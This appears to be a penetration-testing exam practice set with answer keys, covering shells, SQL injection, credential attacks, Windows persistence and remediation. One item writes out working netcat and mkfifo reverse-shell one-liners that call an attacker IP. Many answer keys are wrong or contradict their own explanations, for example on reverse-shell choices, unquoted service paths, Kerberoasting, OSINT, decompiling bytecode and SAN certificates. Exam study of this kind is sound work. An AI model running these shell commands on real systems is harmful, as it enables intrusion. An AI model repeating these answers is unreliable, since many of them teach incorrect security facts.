During a compliance scan of a customer's Apache HTTP server, you discover the following in the http.conf file. What is a potential concern given the output of the compliance scan?```<Directory /htdocs/sensitive/> Order Deny, Allow Deny from all Allow from all</Directory>``` A. The HTTP server contains a sensitive directory that needs to be protected. B. The HTTP server is configured to allow anyone to access, what looks to be, a sensitive part of the web server, which warrants further discussion with the customer. C. The HTTP server is configured correctly, and there is no call for concern. D. The HTTP server is configured to deny all, which would restrict access for valid users

B. The sensitive directory is open and exposed and allows access from anywhere. This is a concern as unauthorized individuals may have access to sensitive data in that location.

Beth recently conducted a phishing attack against a penetration testing target in an attempt to gather credentials that she might use in later attacks. What stage of the penetration testing process is Beth in? A. Planning and Scoping B. Attacking and Exploiting C. Information Gathering and Vulnerability Identification D. Reporting and Communication Results

B. While Beth is indeed gathering information during a phishing attack, she is conducting an active social engineering attack. This moves beyond the activities of Information Gathering and Vulnerability Identification and moves into the realm of Attacking and Exploiting

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO). A. nc 192.168.1.5 44444 B. nc -nlvp 44444 -e /bin/sh C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f D. nc -e /bin/sh 192.168.1.5 44444 E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f

BC

Which of the following is not an SQL injection technique? A. Time Delay B. DOM-based SQL injection C. Boolean D. Union Operators

BCD. Union operators are typically used when a SQL injection vulnerability allows a SELECT statement to combine two queries into a single result or a set of results. The Boolean technique is used to verify whether certain conditions are true or false. The error-based technique is used to force the database to generate an error in order to enhance and refine an attack (injection). Out-of-band injection is typically used to obtain records from the database by using a different channel. For example, it is possible to make an HTTP connection to send the results to a different web server or a local machine running a web service. An attacker may use the time delay technique when he or she doesn't get any output or error messages from the application.

A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE). A. Mandate all employees take security awareness training. B. Implement two-factor authentication for remote access. C. Install an intrusion prevention system. D. Increase password complexity requirements. E. Install a security information event monitoring solution. F. Prevent members of the IT department from interactively logging in as administrators. G. Upgrade the cipher suite used for the VPN solution.

BCG

What are the two forms of blind SQL injection?

Blind content-based SQL injection & Bling timing-based SQL injection

Which of the following allow for Bluetooth device discovery? (Choose two.) A. BBProxy B. BT Browser C. BlueScanner D. PhoneSnoop

BlueScanner (from SourceForge) does a great job of finding devices around you, and can also try to extract and display as much information as possible. BT Browser is another great, and well-known, tool for finding and enumerating nearby devices.

What technique is required to use LSASS to help compromise credentials on a modern Windows system? A. Set storage to "unencrypted." B. Enable LSASS legacy support. C. Turn on WDigest. D. Disable LSASS 2.0

C. Enabling WDigest on a modern Windows system that you have already compromised will cause it to cache plaintext passwords when each user logs in next

After compromising a remote host, Cameron uses ssh to connect to port 4444 from his penetration testing workstation. What type of remote shell has he set up? A. A reverse shell B. A root shell C. A bind shell D. A blind shell

C. Cameron has set up a bind shell, which connects a shell to a service port. A reverseshell would have initiated a connection from the compromised host to his penetration testing workstation (or another system Cameron has access to). The question does not provideenough information to determine if the shell might be a root shell, and blind shell is not acommon penetration testing term.

What vulnerability should Charles target if he discovers a service with the following line in its system invocation? Pathvariable = "C:\Program Files\Common Files\exampleapp\example.exe" A. DLL hijacking B. Writeable service C. Modified plain text D. Unquoted service path

C. Developers often inadvertently leave out quotes or forget to escape quotes properly, allowing penetration testers to insert programs in the path that will execute instead of the desired service. Charles should place his own program in the path and then attempt to cause the service or system to restart, replacing the running legitimate service with his own

You have just concluded a penetration test for a client. During the test, you discovered that the organization's employees made extensive use of a shared Google Drive account to collaborate. You were able to use a social engineering exploit to get access to the shared account and access sensitive files. To address this vulnerability, you recommend that the client disallow this practice among employees. What type of solution is this? A. Technological B. People C. Process D. Scalable

C. Forbidding employees from using external cloud-based services such as Google Drive is an example of a process-based mitigation strategy.

After gaining access to a Windows system, Fred uses the following command: SchTasks /create /SC Weekly /TN "Antivirus" /TR C:\Users\SSmith\av.exe" /ST 09:00 What has he accomplished? A. He has set up a weekly antivirus scan. B. He has set up a job called "weekly." C. He has scheduled his own executable to run weekly. D. Nothing; this command will only run on Linux

C. Fred has used the scheduled tasks tool to set up a weekly run of av.exe from a user directory at 9 a.m. It is fair to assume in this example that Fred has gained access to SSmith's user directory and has placed his own av.exe file there and is attempting to make it look innocuous if administrators find it

An attacker was able to gain access to your organization's network closet while posing as a HVAC technician. While he was there, he installed a network sniffer in your switched network environment. The attacker now wants to sniff all of the packets in the network. What attack should he use? A. Fraggle B. Smurf C. MAC Flood D. Tear Drop

C. MAC flooding is a technique employed to compromise the security of switched network devices. The attack forcing legitimate MAC addresses out of the table of contents in the switch and forcing a unicast flooding behavior potentially sending sensitive information to portions of the network where it is not normally intended to go. Essentially, since the switch table of contents is flooding with bad information, the switch "fails open" and begins to act like a hub, broadcasting all the frames out every port. This would allow the attacker to sniff all of the network packets since he is connected to one of those switch ports.

Jacob wants to capture user hashes on a Windows network. Which tool could he select to gather these from broadcast messages? A. Metasploit B. Responder C. Impacket D. Wireshark

C. Metasploit's SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts. Impacket doesn't build this capability in but provides a wide range of related tools, including the ability to authenticate with hashes once you have captured them. If you're wondering about encountering this type of question on the exam, remember to eliminate the answers you are sure of to reduce the number of remaining options. Here, you can likely guess that Metasploit has a module for this, and Wireshark is a packet capture tool, so capturing broadcast traffic may require work, but would be possible. Now you're down to a 50/50 chance!

What must be developed in order to show security improvements over time? A. Taxonomy of vulnerabilities B. Testing tools C. Metrics D. Reports

C. Metrics are a method of measuring something over time. If you wish to show the effect of security improvements over time, creating a metrics would be a good option. For example, you may wish to look at the number of unpatched and known vulnerabilities. As this number decreases, your network would be considered to have improved security.

A hacker successfully modified the sale price of items purchased through your company's web site. During the investigation that followed, the security analyst has verified the web server and Oracle database was not compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the mostly likely method that the attacker used to change the sale price of the items purchased? A. Cross-site scripting B. Buffer overflow attack C. Changing hidden form values D. SQL injection

C. Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker changed hidden form values to change the price of the items in the shopping cart.

Disassembling and decompiling an application from its original format to look for security bugs is considered which of the following activities? A. Debugging B. DAST C. SAST D. Source code analysis

C. Static application security testing (SAST) is correct. SAST is a debugging method used to examine source code, bytecode, and binaries for security deficiencies and does not involve executing the application

Which one of the following PowerShell execution policies allows the execution of any PowerShell script that you write on the local machine but requires that scripts downloaded from the Internet are signed by a trusted publisher? A. Bypass B. Unrestricted C. RemoteSigned D. AllSigned

C. The RemoteSigned policy allows the execution of any PowerShell script that you write on the local machine but requires that scripts downloaded from the Internet are signed by a trusted publisher

A web application developer included the following HTML code within a form page: <input type=hidden> This is an example of which unsecure code practice? A. Comments in source code B. Hidden elements C. Unauthorized use of functions/unprotected APIs D. Race conditions

C. The programmer in this scenario has used hidden elements in the HTML code. This is an unsecure coding practice that can result in sensitive information being stored in the user's browser (the DOM)

While Angela is conducting a penetration test, she gains access to a Windows Deployment Services server for her target organization. What critical information can she expect to obtain from the unattended installation files she finds there? A. Domain administrator passwords B. Local user passwords C. Local administrator passwords D. Domain user passwords

C. The unattended installation files include local administrator passwords stored in either plain text or Base-64 form. Angela can easily acquire the passwords from those files using Metasploit's enum_unattend tool or manually if she chooses to

Charleen has captured NTLM hashes and wants to conduct a pass-the-hash attack. Unfortunately, she doesn't know which systems on the network may accept the hash. What tool could she use to help her conduct this test? A. Hashcat B. smbclient C. Hydra D. None of the above

C. This situation calls for a tool that handles attacks against many machines effectively. Fortunately, Hydra is designed to do just that and includes support for NTLM hashes as a password—in fact, Medusa does too! Hashcat is a password cracking and recovery tool, while smbclient is a legitimate SMB client tool and isn't designed to conduct a network-wide test for pass-the-hash exploitability.

A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection. Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not in a position to risk the availability on the application. Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.) A. Identity and eliminate inline SQL statements from the code. B. Identify and eliminate dynamic SQL from stored procedures. C. Identify and sanitize all user inputs. D. Use a whitelist approach for SQL statements. E. Use a blacklist approach for SQL statements. F. Identify the source of malicious input and block the IP address

CD

A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer? A. Run the application through a dynamic code analyzer. B. Employ a fuzzing utility. C. Decompile the application. D. Check memory allocations.

D. Check memory allocations

Which of the following is a popular tool that can be used to perform golden ticket and many other types of attacks? A. EmpireShell B. Mimikatz C. PowerShell D. Empire

D. Empire is a popular tool that can be used to perform golden ticket and many other types of attacks.

If you are unable to ping a target because you are receiving no response or a response that states the destination is unreachable, then ICMP may be disabled on the remote end. If you wanted to try to elicit a response from a host using TCP, what tool would you use? A. Broadcast ping B. Traceroute C. TCP ping D. Hping

D. Hping is a handy little utility that assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. Hping is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rule sets. It is also great for learning more about TCP/IP and experimenting with IP protocols. Hping doesn't support IPv6, though, so the creators of NMAP have created Nping to fill this gap and serve as an updated variant of Hping.

A security administrator is trying to encrypt communication by using the Subject Alternative Name (SAN) attribute of a certificate. What is a reason why the administrator should take advantage of SAN? A. Can protect multiple domains B. Does not require a trusted certificate authority (CA) C. Protects unlimited subdomain D. Provides extended site validation

D. Subject Alternative Name (SAN) is an extension to X.509 that allows various values to be associated with a security certificate using a subjectAltName field. These values are called SANs and include email addresses, IP addresses, URLs, DNS names, directory names, and other names followed by a value. Using SAN provides extended site validation

Which of the following is the best course of action for a penetration tester who is required to perform open-source intelligence (OSINT) on the staff at a target company after completing the infrastructure aspect? A. Go to the client location and use impersonation to obtain information from the staff. B. Using social engineering techniques, try to obtain staff information by calling the company. C. Search the Internet for information on the staff, such as visiting social networking sites. D. Send spoofed emails to the staff to see if they will respond with sensitive information

D. In this scenario, since you are trying to preform OSINT on the staff of the company, it would be best to send spoofed emails to the staff to see whether they will respond with sensitive information. Penetration testers need to be ready to incorporate social engineering in their test plan if allowed by the rules of engagement and included in the scope of work.

You are a penetration tester, and you are conducting a test for a new client. During the internal penetration test, several multicast and broadcast name resolution requests are observed moving through the network. You want to impersonate network resources and collect authentication requests. What tool should you use? A. Ettercap B. Medusa C. Tcpdump D. Responder

D. In this scenario, the question specifically states "name resolution requests." In this case, Responder is the best choice. Responder is a toolkit used to answer NetBIOS queries from Windows systems on a network. Tcpdump is a type of packet analyzer software utility that monitors and logs TCP/IP traffic passing between a network and the computer on which it is executed. Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. Medusa is a brute-force login attack tool that supports a variety of protocols and services

Angela wants to run John the Ripper against a hashed password file she has acquired from a compromise. What information does she need to know to successfully crack the file? A. A sample word list B. The hash used C. The number of passwords D. None of the above

D. John includes automatic hash type detection, so Angela can simply feed John the Ripper the hashed password file. If it is in a format that John recognizes, it will attempt to crack the passwords.

You are a penetration tester and looking at performing a Kerberoasting attack. Given the following situations, in which one would you perform a Kerberoasting attack? A. The tester compromised a Windows device and dumps the Local Security Authority (LSA) secrets. B. The tester needs to retrieve the Security Account Manager (SAM) database and crack the password hashes. C. The tester compromised a user account that has limited privileges and needs to target other accounts for lateral movement. D. The tester compromised an account and needs to dump hashes and plaintext passwords from the system.

D. Kerberoasting is a technique that relies on requesting service tickets for service account service principal names (SPNs). The tickets are encrypted with the password of the service account associated with the SPN, meaning that once a tester has obtained the service tickets by using a tool like Mimikatz, the tester can crack the tickets to obtain the service account password using offline cracking tools. Kerberoasting is a four-step process:Scan Active Directory for user accounts with service principal names (SPNs) set.Request service tickets using the SPNs.Extract the service tickets from memory and save to a file.Conduct an offline brute-force attack against the passwords in the service tickets.

Which open source research source is maintained by the U.S. government's National Institute of Science and Technology and provides a summary of current security? A. CERT B. Full Disclosure C. CVE D. NVD

D. The National Vulnerability Database (NVD) is maintained by the U.S. government's National Institute of Science and Technology. The NVD can be accessed at https://nvd .nist.gov. This website provides a summary of current security vulnerabilities ranked by their severity

You have just concluded a penetration test for a client that uses a large number of temporary workers and contractors. In your findings, you report that temporary and contract user accounts are frequently not deactivated or removed when their work is complete because they frequently come back to work on new projects several months later. Given that the client uses Linux desktops and servers, which of the following Linux commands should you recommend they use to manually lock temporary or contract user accounts until the worker returns for a new project? A. lockusr B. chmod C. chage D. passwd

D. To harden a server system, you should make sure all stale user accounts are disabled or deleted. In this scenario, the client doesn't want to delete the accounts because the temporary or contract users may be coming back in the future. To lock an account manually, you can use the passwd -l command followed by the name of the user

A penetration tester has exploited an FTP server using Metasploit and now wants to pivot to the organization's LAN. What is the best method for the penetration tester to use to conduct the pivot? A. Issue the pivot exploit and setup meterpreter B. Reconfigure the network settings in meterpreter C. Set the payload to propagate through meterpreter D. Create a route statement in meterpreter

D. Since the penetration tester has been able to exploit the FTP server from outside the LAN, they will need to setup a route statement in meterpreter. Metasploit make this very simple, since it also has an autoroute meterpreter script that will allow us to attack this second network through our first compromised machine (the FTP server) by creating the routes we need

You have conducted a Google search for the "site:webserver.com -site:sales.webserver.com financial". What results do you expect to receive? A. Google results for keyword matches on webserver.com and sales.webserver.com that include the word "financial" B. Google results matching all words in the query C. Google ersults for keyword matches from the site sales.webserver.com that are in the domain webserver.com but do not include the world financial D. Google results matching "financial" in domain webserver.com, but no results form the site sales.webserver.com

D. When conducting a Google search, using site:AAA in the query will return results only from that website (AAA). If you use -site:AAA, you will get results that are explicitly not on the website (AAA). In the case of this question, no results should show up from sales.webserver.com. All results should only come from webserver.com.

A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO). A. Cleartext exposure of SNMP trap data B. Software bugs resident in the IT ticketing system C. S/MIME certificate templates defined by the CA D. Health information communicated over HTTP E. DAR encryption on records servers

DE

The customer has requested the pentest report be encrypted and e-mailed to the project manager identified in the RoE. From the following choices, which option reduces the risk of unauthorized disclosure? A. Encrypt the email and report then send the decryption password via text message. B. Encrypt the report and then send the decryption password and the report in the same email. C. Encrypt the email and report and send them to the project manager. D. Encrypt the email and report then send the decryption password for the report via another email.

Encrypt the e-mail and report then send the decryption password for the report via text message is correct. Using different transport paths for sending the report and decryption password can help maximize continuity and reduce the risk of unauthorized disclosure, should one path become compromised.

Which of the following utilities can be used to enumerate NFS share information from a file server over the network? (Choose two.) A. All the answers are correct B. 'nfs-shoumount.nse' C. 'rpcinfo' D. 'showmount'

Showmount is correct because the `showmount` command can be used to enumerate NFS shares from a Unix or Linux NFS file server. Nfs-showmount.nse is correct because `nfs-showmount.nse` can be used with the Nmap Scripting Engine to enumerate share information from NFS servers over the network.'

When should you dispose of the customer's pentest report and sensitive data? (Choose the BEST answer.) A. After the customer debrief. B. The report should be disposed after the customer confirms receipt of the pentest report, based on agreed-upon terms in the RoE. C. Once the customer confirms receipt of the pentest report. D. Never

The report should be disposed of after the customer confirms receipt of the pentest report, based on agreed-upon terms in the RoE is correct. Once the customer has provided confirmation of successfully receiving and extracting the report, all remaining digital or written copies of the report should be marked for proper disposal and deletion, based on agreed-upon methods outlined in the rules of engagement (RoE).

Which of the following best describes a biometric passport? A. Something you are B. Something your require C. Something you have D. Something you know

There are three main types of authentication: something you know, something you have, and something you are. When we see "biometric," we instantly want to click "something you are" and move on. But in this case it's asking about a biometric passport, which is actually biometric information stored on a chip. The biometric passport is a physical object; therefore, this is something you have.

When using the airodump-ng tool to collect wireless network packets, why would you want to define the channel to listen on? A. You should always specify the channel your target is listening on when conducting wireless surveys and exploitation activities. B. Channel hopping is a technique used by airodump-ng to determine the channel a target host is listening on. C. When attempting to crack the wireless encryption key or 4-way handshake, it's best to stick to the channel your target is listening on to prevent frequency hopping, which could limit your ability to collect all of the packets necessary for password recovery attacks D. Using the same channels as your target wireless device will help speed up the time necessary to crack the PSK offline.

When attempting to crack the wireless encryption key or four-way handshake, it's best to stick to the channel your target is listening on to prevent frequency hopping, which could limit your ability to collect all of the packets necessary for password recovery attacks is correct. The airodump-ng tool will hop from channel to channel and restrict your ability to collect all of the packets necessary to recover the WEP key or four-way handshake from a WPA network. Camping out on the specific channel will help increase the odds of successful exploitation.

A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform? A. Vulnerability scan B. Dynamic scan C. Static scan D. Compliance scan

c

What criteria should be used in prioritizing the remediation of vulnerabilities?

criticality, difficulty, severity, & exposure

Which command can be used to help analyze the contents of a binary file? (Selecttwo all that apply.) A. binwalk B. cat C. strings D. echo

strings' is correct because the `strings` command is a useful utility in Linux to print the strings of printable characters in files (that is, ASCII characters) that are at least four characters in length. 'binwalk' is correct because the `binwalk` command is a fast and easy-to-use tool for analyzing and reverse-engineering executables and firmware images, such as those loaded on embedded devices (Wi-Fi routers, IoT, and so on).